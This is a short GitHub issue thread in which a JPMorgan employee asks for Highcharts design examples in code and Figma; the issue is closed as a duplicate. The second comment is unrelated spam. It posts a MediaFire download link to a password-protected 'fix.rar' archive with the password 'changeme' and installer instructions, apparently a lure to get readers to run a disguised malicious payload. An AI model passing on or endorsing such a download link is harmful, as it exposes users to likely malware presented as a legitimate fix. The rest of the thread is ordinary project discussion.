### ISSUE TITLE
Chart Theme: create High Charts design examples

### ISSUE THREAD

**Issue by dplsek** [jpmorganchase/salt-ds#4037] opened 2024-08-26 17:19 UTC
### Area

UI Components

### The problem

Consumers need High Chart examples to reference in code and Figma for their designs.

### The solution

Create High Chart design examples in code and Figma for reference.

### Alternatives and examples

TBD

### Are you a JPMorgan Chase & Co. employee?

- [x] I am an employee of JPMorgan Chase & Co.

**Comment by dseynhae** [comment] 2024-08-26 17:20
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by joshwooding** [comment] 2024-08-26 17:48
Duplicate of #4036

**Closed by joshwooding** 2024-08-26 17:48 UTC
